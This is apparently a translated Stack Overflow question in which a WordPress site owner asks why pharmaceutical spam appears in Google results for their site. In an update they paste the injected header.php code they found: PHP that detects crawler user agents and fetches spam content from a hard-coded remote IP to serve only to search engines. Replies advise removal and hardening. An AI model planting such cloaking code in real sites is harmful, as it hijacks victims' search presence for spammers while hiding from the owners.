【发布时间】:2017-06-14 11:33:03
【问题描述】:
我是 www.cuscalgary.ca 的网站管理员。如果您在 google 中搜索“cus calgary”,我的网站有一些链接在链接描述中似乎有奇怪的、看似荷兰语的字符串(见下面的屏幕截图),例如“köpa viagra snabbleverans”。此外,我在 Google 上我网站的主链接下收到了“该网站可能被黑客入侵”的消息。
到目前为止,我已经尝试通过 Google Chrome 的网络浏览器和 CTRL+F 检查页面的代码,以查找搜索结果中显示的字词(例如,尝试在“联系我们”页面中查找“Paul Junker”) ,我尝试下载主题文件夹并通过notepad ++执行“搜索文件夹”功能以查找任何那些奇怪的字符串。我什至尝试通过 Wordpress 仪表板来查找这些字符串中的任何一个。唉,我没有发现这些奇怪的字符串的迹象。
我开始认为 Google 可能有一段时间没有抓取我的网站了,并且这些字符串已经以某种方式被删除了。虽然,我怀疑情况是否如此。
有没有人有类似的经历并找到了解决方案?如果是这样,我真的很高兴听到您如何处理这种滋扰。
非常感谢您的帮助 - 感谢所有帮助。
凯尔西
更新:
我可能在 header.php 文件中找到了罪魁祸首。查看我在以下文件开头找到的代码:
<?php
$user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#',
'#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i',
'#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i',
'#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i',
'#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*note#i', '#FAST\s*MetaWeb\s*Crawler#i',
'#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i',
'#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i',
'#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',
'#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',
'#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i',
'#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i',
'#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i',
'#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i',
'#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#altavista#i',
'#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i',
'#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i',
'#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',
'#charlotte#i', '#ngb#i', '#BingBot#i' ) ;
if ( !empty( $_SERVER['HTTP_USER_AGENT'] ) && ( FALSE !== strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ){
$isbot = 1;
}
if( FALSE !== strpos( gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google'))
{
$isbot = 1;
}
if(@$isbot){
$_SERVER[HTTP_USER_AGENT] = str_replace(" ", "-", $_SERVER[HTTP_USER_AGENT]);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://173.236.65.24/cakes/?useragent=$_SERVER[HTTP_USER_AGENT]&domain=$_SERVER[HTTP_HOST]");
$result = curl_exec($ch);
curl_close ($ch);
echo $result;
}
?><!DOCTYPE html>
【问题讨论】:
-
我在您网站的 HTML 中没有看到任何这些字符串。我建议你等几天,看看谷歌是否更新了搜索结果。至于黑客问题,如果您公司中的其他人可以访问该网站,请考虑询问他们是否进行了任何更改。
-
这样就行了。
-
删除它仍然只是其中的一部分。您需要实施一个解决方案来降低它再次发生的风险。如果您在共享服务器上,则更加困难,因为有目录遍历工具允许其他人通过将其上传到不同的帐户并获得外壳访问权限来从服务器上的其他位置访问您的站点。但是 WP 有一些很好的安全工具。一定要检查 Wordfence(有免费和付费版本)并定期备份。
标签: wordpress debugging search google-search